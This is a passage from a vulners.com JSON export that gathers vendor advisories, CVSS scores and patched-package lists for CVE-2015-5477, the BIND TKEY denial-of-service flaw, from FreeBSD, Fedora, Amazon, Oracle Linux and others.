Correction details\r\n\r\nThe following list contains the correction revision numbers for each\r\naffected branch.\r\n\r\nBranch/path Revision\r\n-------------------------------------------------------------------------\r\nstable/8/ r285977\r\nreleng/8.4/ r285980\r\nstable/9/ r285977\r\nreleng/9.3/ r285980\r\n-------------------------------------------------------------------------\r\n\r\nTo see which files were modified by a particular revision, run the\r\nfollowing command, replacing NNNNNN with the revision number, on a\r\nmachine with Subversion installed:\r\n\r\n# svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base\r\n\r\nOr visit the following URL, replacing NNNNNN with the revision number:\r\n\r\n<URL:https://svnweb.freebsd.org/base?view=revision&revision=NNNNNN>\r\n\r\nVII. References\r\n\r\n<URL:https://kb.isc.org/article/AA-01272>\r\n\r\n<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5477>\r\n\r\nThe latest revision of this advisory is available at\r\n<URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-15:17.bind.asc>\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2015-08-03T00:00:00", "title": "FreeBSD Security Advisory FreeBSD-SA-15:17.bind", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2015-08-03T00:00:00", "id": "SECURITYVULNS:DOC:32383", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32383", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:01", "description": "Assert on TKEY request processing.", "edition": 1, "cvss3": {}, "published": "2015-08-03T00:00:00", "title": "ISC bind named DoS", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2015-08-03T00:00:00", "id": "SECURITYVULNS:VULN:14619", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14619", "cvss": {"score": 7.8, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:03:08", "description": "Over 150 different vulnerabilities in system components and libraries.", "edition": 2, "cvss3": {}, "published": "2015-08-17T00:00:00", "title": "Apple Mac OS X / OS X Server multiple security vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2015-5768", "CVE-2015-5600", "CVE-2015-2787", "CVE-2015-5779", "CVE-2013-1775", "CVE-2015-3185", "CVE-2015-3786", "CVE-2015-1792", "CVE-2015-3761", "CVE-2014-7844", "CVE-2015-3781", "CVE-2015-3776", "CVE-2015-2783", "CVE-2015-5748", "CVE-2014-1912", "CVE-2015-5477", "CVE-2015-3802", "CVE-2015-3797", "CVE-2014-0191", "CVE-2015-3762", "CVE-2015-3329", "CVE-2009-5078", "CVE-2015-5754", "CVE-2015-3783", "CVE-2015-3330", "CVE-2014-3613", "CVE-2015-1789", "CVE-2015-3789", "CVE-2014-8150", "CVE-2014-3583", "CVE-2015-3779", "CVE-2015-3788", "CVE-2015-3778", "CVE-2015-0241", "CVE-2013-1776", "CVE-2015-5776", "CVE-2015-3766", "CVE-2015-3775", "CVE-2013-7338", "CVE-2015-3798", "CVE-2015-5777", "CVE-2015-3765", "CVE-2015-3782", "CVE-2015-0242", "CVE-2015-0253", "CVE-2015-3784", "CVE-2015-3787", "CVE-2015-3799", "CVE-2015-3153", "CVE-2015-3768", "CVE-2015-3760", "CVE-2015-4148", "CVE-2015-5781", "CVE-2015-3805", "CVE-2015-3790", "CVE-2015-5774", "CVE-2015-3792", "CVE-2015-3803", "CVE-2015-3307", "CVE-2015-4025", "CVE-2015-5784", "CVE-2015-5751", "CVE-2015-4024", "CVE-2015-3795", "CVE-2015-5750", "CVE-2015-5747", "CVE-2015-4021", "CVE-2015-3144", "CVE-2014-7185", "CVE-2015-5761", "CVE-2013-2777", "CVE-2015-3794", "CVE-2015-5773", "CVE-2015-3769", "CVE-2014-3707", "CVE-2015-3800", "CVE-2015-0228", "CVE-2015-3807", "CVE-2015-0244", "CVE-2015-4026", "CVE-2014-8769", "CVE-2015-5756", "CVE-2014-3660", "CVE-2015-1788", "CVE-2015-4147", "CVE-2014-8161", "CVE-2012-6685", "CVE-2015-5753", "CVE-2015-3183", "CVE-2015-3772", "CVE-2014-3620", "CVE-2014-9140", "CVE-2013-2776", "CVE-2015-4022", 
"CVE-2015-3770", "CVE-2015-3777", "CVE-2015-5771", "CVE-2015-5775", "CVE-2015-3780", "CVE-2013-7422", "CVE-2015-5755", "CVE-2015-3145", "CVE-2015-1790", "CVE-2015-5758", "CVE-2014-0106", "CVE-2015-0243", "CVE-2015-3804", "CVE-2015-3773", "CVE-2014-3581", "CVE-2015-3774", "CVE-2015-5782", "CVE-2014-8109", "CVE-2015-5778", "CVE-2013-7040", "CVE-2015-3757", "CVE-2015-3764", "CVE-2015-3143", "CVE-2014-0067", "CVE-2015-5772", "CVE-2015-3791", "CVE-2014-9365", "CVE-2014-8151", "CVE-2015-5757", "CVE-2015-3796", "CVE-2009-5044", "CVE-2015-5783", "CVE-2014-9680", "CVE-2015-5763", "CVE-2014-8767", "CVE-2015-3767", "CVE-2015-3806", "CVE-2015-1791", "CVE-2015-3771", "CVE-2015-3148"], "modified": "2015-08-17T00:00:00", "id": "SECURITYVULNS:VULN:14630", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14630", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "description": "BIND (Berkeley Internet Name Domain) is an implementation of the DNS (Domain Name System) protocols. BIND includes a DNS server (named), which resolves host names to IP addresses; a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating properly. 
", "edition": 2, "cvss3": {}, "published": "2015-08-01T02:25:40", "type": "fedora", "title": "[SECURITY] Fedora 22 Update: bind-9.10.2-4.P3.fc22", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2015-08-01T02:25:40", "id": "FEDORA:50F6A611BAAF", "href": "", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-12-21T08:17:53", "description": "BIND (Berkeley Internet Name Domain) is an implementation of the DNS (Domain Name System) protocols. This package set contains only export version of BIND libraries, that are used for building ISC DHCP. 
", "edition": 2, "cvss3": {}, "published": "2015-08-01T02:27:27", "type": "fedora", "title": "[SECURITY] Fedora 22 Update: bind99-9.9.7-6.P2.fc22", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2015-08-01T02:27:27", "id": "FEDORA:647FF6124C7D", "href": "", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-12-21T08:17:53", "description": "BIND (Berkeley Internet Name Domain) is an implementation of the DNS (Domain Name System) protocols. BIND includes a DNS server (named), which resolves host names to IP addresses; a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating properly. 
", "edition": 2, "cvss3": {}, "published": "2015-08-01T02:26:01", "type": "fedora", "title": "[SECURITY] Fedora 21 Update: bind-9.9.6-10.P1.fc21", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8500", "CVE-2015-1349", "CVE-2015-4620", "CVE-2015-5477"], "modified": "2015-08-01T02:26:01", "id": "FEDORA:4DC6A61361BA", "href": "", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-02-18T07:36:10", "description": "A denial of service vulnerability has been reported in ISC BIND DNS servers. The vulnerability is due to the way that the DNS server improperly handles invalid TKEY resource records. A remote attacker may exploit this issue by sending a specially crafted DNS query to a DNS server. 
Successful exploitation may cause the server to crash, resulting in a denial of service condition.", "cvss3": {}, "published": "2020-12-22T00:00:00", "type": "checkpoint_advisories", "title": "ISC BIND TKEY Queries Assertion Failure (CVE-2015-5477)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2020-12-22T00:00:00", "id": "CPAI-2015-1084", "href": "", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-12-17T11:45:31", "description": "A denial of service vulnerability has been reported in ISC BIND DNS servers. The vulnerability is due to the way that the DNS server improperly handles invalid TKEY resource records. A remote attacker may exploit this issue by sending a specially crafted DNS query to a DNS server. 
Successful exploitation may cause the server to crash, resulting in a denial of service condition.", "cvss3": {}, "published": "2015-08-01T00:00:00", "type": "checkpoint_advisories", "title": "ISC BIND Invalid TKEY Query Denial Of Service (CVE-2015-5477)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2016-02-14T00:00:00", "id": "CPAI-2015-0908", "href": "", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "ubuntucve": [{"lastseen": "2021-11-22T21:49:09", "description": "named in ISC BIND 9.x before 9.9.7-P2 and 9.10.x before 9.10.2-P3 allows\nremote attackers to cause a denial of service (REQUIRE assertion failure\nand daemon exit) via TKEY queries.", "cvss3": {}, "published": "2015-07-28T00:00:00", "type": "ubuntucve", "title": "CVE-2015-5477", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2015-07-28T00:00:00", "id": "UB:CVE-2015-5477", "href": "https://ubuntu.com/security/CVE-2015-5477", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "amazon": 
[{"lastseen": "2021-09-27T19:37:27", "description": "**Issue Overview:**\n\nAs <a href=\"https://kb.isc.org/article/AA-01272/0\">reported upstream</a>, an error in the handling of TKEY queries can be exploited by an attacker for use as a denial-of-service vector, as a constructed packet can use the defect to trigger a REQUIRE assertion failure, causing BIND to exit.\n\n \n**Affected Packages:** \n\n\nbind\n\n \n**Issue Correction:** \nRun _yum update bind_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n \u00a0\u00a0\u00a0 bind-libs-9.8.2-0.30.rc1.38.amzn1.i686 \n \u00a0\u00a0\u00a0 bind-chroot-9.8.2-0.30.rc1.38.amzn1.i686 \n \u00a0\u00a0\u00a0 bind-sdb-9.8.2-0.30.rc1.38.amzn1.i686 \n \u00a0\u00a0\u00a0 bind-utils-9.8.2-0.30.rc1.38.amzn1.i686 \n \u00a0\u00a0\u00a0 bind-devel-9.8.2-0.30.rc1.38.amzn1.i686 \n \u00a0\u00a0\u00a0 bind-9.8.2-0.30.rc1.38.amzn1.i686 \n \u00a0\u00a0\u00a0 bind-debuginfo-9.8.2-0.30.rc1.38.amzn1.i686 \n \n src: \n \u00a0\u00a0\u00a0 bind-9.8.2-0.30.rc1.38.amzn1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 bind-sdb-9.8.2-0.30.rc1.38.amzn1.x86_64 \n \u00a0\u00a0\u00a0 bind-chroot-9.8.2-0.30.rc1.38.amzn1.x86_64 \n \u00a0\u00a0\u00a0 bind-libs-9.8.2-0.30.rc1.38.amzn1.x86_64 \n \u00a0\u00a0\u00a0 bind-utils-9.8.2-0.30.rc1.38.amzn1.x86_64 \n \u00a0\u00a0\u00a0 bind-9.8.2-0.30.rc1.38.amzn1.x86_64 \n \u00a0\u00a0\u00a0 bind-debuginfo-9.8.2-0.30.rc1.38.amzn1.x86_64 \n \u00a0\u00a0\u00a0 bind-devel-9.8.2-0.30.rc1.38.amzn1.x86_64 \n \n \n", "cvss3": {}, "published": "2015-07-28T11:32:00", "type": "amazon", "title": "Critical: bind", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": 
"NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2015-07-28T11:32:00", "id": "ALAS-2015-573", "href": "https://alas.aws.amazon.com/ALAS-2015-573.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "oraclelinux": [{"lastseen": "2021-05-13T09:23:39", "description": "[32:9.8.2-0.37.rc1.2]\n- Fix CVE-2015-5477", "cvss3": {}, "published": "2015-07-29T00:00:00", "type": "oraclelinux", "title": "bind security update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2015-07-29T00:00:00", "id": "ELSA-2015-1513", "href": "http://linux.oracle.com/errata/ELSA-2015-1513.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-05-13T09:24:15", "description": "[32:9.7.0-21.P2.2]\n- Fix CVE-2015-5477\n[32:9.7.0-21.P2.1]\n- Fix CVE-2014-8500 (#1171972)", "cvss3": {}, "published": "2015-07-29T00:00:00", "type": "oraclelinux", "title": "bind97 security update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-8500", "CVE-2015-5477"], "modified": "2015-07-29T00:00:00", "id": "ELSA-2015-1515", "href": "http://linux.oracle.com/errata/ELSA-2015-1515.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-05-13T09:23:48", "description": "[30:9.3.6-25.P1.3]\n- Fix CVE-2015-5477\n[30:9.3.6-25.P1.2]\n- Remove files backup after patching (Related: #1171971)\n[30:9.3.6-25.P1.1]\n- Fix CVE-2014-8500 (#1171971)", "cvss3": {}, "published": "2015-07-29T00:00:00", "type": "oraclelinux", "title": "bind security update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-8500", "CVE-2015-5477"], "modified": "2015-07-29T00:00:00", "id": "ELSA-2015-1514", "href": "http://linux.oracle.com/errata/ELSA-2015-1514.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-06-04T20:20:44", "description": "[32:9.7.0-21.P2.3]\n- Fix 
CVE-2015-5722\n[32:9.7.0-21.P2.2]\n- Fix CVE-2015-5477\n[32:9.7.0-21.P2.1]\n- Fix CVE-2014-8500 (#1171972)", "cvss3": {}, "published": "2015-09-03T00:00:00", "type": "oraclelinux", "title": "bind97 security update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-8500", "CVE-2015-5477", "CVE-2015-5722"], "modified": "2015-09-03T00:00:00", "id": "ELSA-2015-1707", "href": "http://linux.oracle.com/errata/ELSA-2015-1707.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-06-04T20:20:34", "description": "[30:9.3.6-25.P1.4]\n- Fix CVE-2015-5722\n[30:9.3.6-25.P1.3]\n- Fix CVE-2015-5477\n[30:9.3.6-25.P1.2]\n- Remove files backup after patching (Related: #1171971)\n[30:9.3.6-25.P1.1]\n- Fix CVE-2014-8500 (#1171971)", "cvss3": {}, "published": "2015-09-03T00:00:00", "type": "oraclelinux", "title": "bind security update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-8500", "CVE-2015-5477", "CVE-2015-5722"], "modified": "2015-09-03T00:00:00", "id": "ELSA-2015-1706", "href": "http://linux.oracle.com/errata/ELSA-2015-1706.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-06-04T20:20:59", "description": "[30:9.3.6-25.P1.5]\n- Fix CVE-2015-8000\n[30:9.3.6-25.P1.4]\n- Fix CVE-2015-5722\n[30:9.3.6-25.P1.3]\n- Fix CVE-2015-5477\n[30:9.3.6-25.P1.2]\n- Remove files backup after patching (Related: #1171971)\n[30:9.3.6-25.P1.1]\n- Fix CVE-2014-8500 (#1171971)", "cvss3": {}, "published": "2015-12-16T00:00:00", "type": "oraclelinux", "title": "bind security update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-8500", "CVE-2015-5477", "CVE-2015-5722", "CVE-2015-8000"], "modified": "2015-12-16T00:00:00", "id": "ELSA-2015-2656", "href": "http://linux.oracle.com/errata/ELSA-2015-2656.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-06-04T20:21:20", "description": "[32:9.7.0-21.P2.4]\n- Fix CVE-2015-8000\n[32:9.7.0-21.P2.3]\n- Fix 
CVE-2015-5722\n[32:9.7.0-21.P2.2]\n- Fix CVE-2015-5477\n[32:9.7.0-21.P2.1]\n- Fix CVE-2014-8500 (#1171972)", "cvss3": {}, "published": "2015-12-16T00:00:00", "type": "oraclelinux", "title": "bind97 security update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-8500", "CVE-2015-5477", "CVE-2015-5722", "CVE-2015-8000"], "modified": "2015-12-16T00:00:00", "id": "ELSA-2015-2658", "href": "http://linux.oracle.com/errata/ELSA-2015-2658.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-07-28T14:25:01", "description": "[30:9.3.6-25.P1.9]\n- Fix CVE-2016-2776\n[30:9.3.6-25.P1.8]\n- Fix issue with patch for CVE-2016-1285 and CVE-2016-1286 found by test suite\n[30:9.3.6-25.P1.7]\n- Fix CVE-2016-1285 and CVE-2016-1286\n[30:9.3.6-25.P1.6]\n- Fix CVE-2015-8704\n[30:9.3.6-25.P1.5]\n- Fix CVE-2015-8000\n[30:9.3.6-25.P1.4]\n- Fix CVE-2015-5722\n[30:9.3.6-25.P1.3]\n- Fix CVE-2015-5477\n[30:9.3.6-25.P1.2]\n- Remove files backup after patching (Related: #1171971)\n[30:9.3.6-25.P1.1]\n- Fix CVE-2014-8500 (#1171971)", "edition": 2, "cvss3": {}, "published": "2016-09-28T00:00:00", "type": "oraclelinux", "title": "bind security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8500", "CVE-2015-5477", "CVE-2015-5722", "CVE-2015-8000", "CVE-2015-8704", "CVE-2016-1285", "CVE-2016-1286", "CVE-2016-2776"], "modified": "2016-09-28T00:00:00", "id": "ELSA-2016-1944", "href": "http://linux.oracle.com/errata/ELSA-2016-1944.html", "cvss": {"score": 7.8, "vector": 
"AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-07-28T14:24:32", "description": "[32:9.7.0-21.P2.7]\n- Fix CVE-2016-2776\n[32:9.7.0-21.P2.6]\n- Fix CVE-2016-1285 and CVE-2016-1286\n[32:9.7.0-21.P2.5]\n- Fix CVE-2015-8704\n[32:9.7.0-21.P2.4]\n- Fix CVE-2015-8000\n[32:9.7.0-21.P2.3]\n- Fix CVE-2015-5722\n[32:9.7.0-21.P2.2]\n- Fix CVE-2015-5477\n[32:9.7.0-21.P2.1]\n- Fix CVE-2014-8500 (#1171972)", "edition": 2, "cvss3": {}, "published": "2016-09-28T00:00:00", "type": "oraclelinux", "title": "bind97 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8500", "CVE-2015-5477", "CVE-2015-5722", "CVE-2015-8000", "CVE-2015-8704", "CVE-2016-1285", "CVE-2016-1286", "CVE-2016-2776"], "modified": "2016-09-28T00:00:00", "id": "ELSA-2016-1945", "href": "http://linux.oracle.com/errata/ELSA-2016-1945.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-07-30T06:24:39", "description": "[32:9.7.0-21.P2.8]\n- Fix CVE-2016-2848\n[32:9.7.0-21.P2.7]\n- Fix CVE-2016-2776\n[32:9.7.0-21.P2.6]\n- Fix CVE-2016-1285 and CVE-2016-1286\n[32:9.7.0-21.P2.5]\n- Fix CVE-2015-8704\n[32:9.7.0-21.P2.4]\n- Fix CVE-2015-8000\n[32:9.7.0-21.P2.3]\n- Fix CVE-2015-5722\n[32:9.7.0-21.P2.2]\n- Fix CVE-2015-5477\n[32:9.7.0-21.P2.1]\n- Fix CVE-2014-8500 (#1171972)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": 
"NONE", "baseScore": 8.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 4.0}, "published": "2016-10-20T00:00:00", "type": "oraclelinux", "title": "bind97 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8500", "CVE-2015-5477", "CVE-2015-5722", "CVE-2015-8000", "CVE-2015-8704", "CVE-2016-1285", "CVE-2016-1286", "CVE-2016-2776", "CVE-2016-2848"], "modified": "2016-10-20T00:00:00", "id": "ELSA-2016-2094", "href": "http://linux.oracle.com/errata/ELSA-2016-2094.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-07-30T06:24:54", "description": "[30:9.3.6-25.P1.10]\n- Fix CVE-2016-2848\n[30:9.3.6-25.P1.9]\n- Fix CVE-2016-2776\n[30:9.3.6-25.P1.8]\n- Fix issue with patch for CVE-2016-1285 and CVE-2016-1286 found by test suite\n[30:9.3.6-25.P1.7]\n- Fix CVE-2016-1285 and CVE-2016-1286\n[30:9.3.6-25.P1.6]\n- Fix CVE-2015-8704\n[30:9.3.6-25.P1.5]\n- Fix CVE-2015-8000\n[30:9.3.6-25.P1.4]\n- Fix CVE-2015-5722\n[30:9.3.6-25.P1.3]\n- Fix CVE-2015-5477\n[30:9.3.6-25.P1.2]\n- Remove files backup after patching (Related: #1171971)\n[30:9.3.6-25.P1.1]\n- Fix CVE-2014-8500 (#1171971)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 8.6, "privilegesRequired": 
"NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 4.0}, "published": "2016-10-20T00:00:00", "type": "oraclelinux", "title": "bind security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8500", "CVE-2015-5477", "CVE-2015-5722", "CVE-2015-8000", "CVE-2015-8704", "CVE-2016-1285", "CVE-2016-1286", "CVE-2016-2776", "CVE-2016-2848"], "modified": "2016-10-20T00:00:00", "id": "ELSA-2016-2093", "href": "http://linux.oracle.com/errata/ELSA-2016-2093.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "[32:9.8.2-0.68.rc1.0.3.8]\n- Backport fix for CVE-2018-5741 [Orabug: 33496185]\n[32:9.8.2-0.68.rc1.0.2.8]\n- Backport possible assertion failure on DNAME processing (CVE-2021-25215)\n[32:9.8.2-0.68.rc1.0.1.8]\n- Backport the fix for buffer overflow (CVE-2020-8625) (Orabug: 32588749)\n[32:9.8.2-0.68.rc1.8]\n- Fix tsig-request verify (CVE-2020-8622)\n[32:9.8.2-0.68.rc1.7]\n- Correct tests covering CVE-2020-8617\n[32:9.8.2-0.68.rc1.6]\n- Add additional fix to limit recursions\n[32:9.8.2-0.68.rc1.5]\n- Add CVE tests to codebase\n[32:9.8.2-0.68.rc1.4]\n- Limit number of queries triggered by a request (CVE-2020-8616)\n- Fix invalid tsig request (CVE-2020-8617)\n[32:9.8.2-0.68.rc1.3]\n- Use only selected documentation files\n[32:9.8.2-0.68.rc1.2]\n- Fix CVE-2018-5743\n[32:9.8.2-0.68.rc1.1]\n- Fix CVE-2018-5740\n[32:9.8.2-0.68.rc1]\n- Fix 
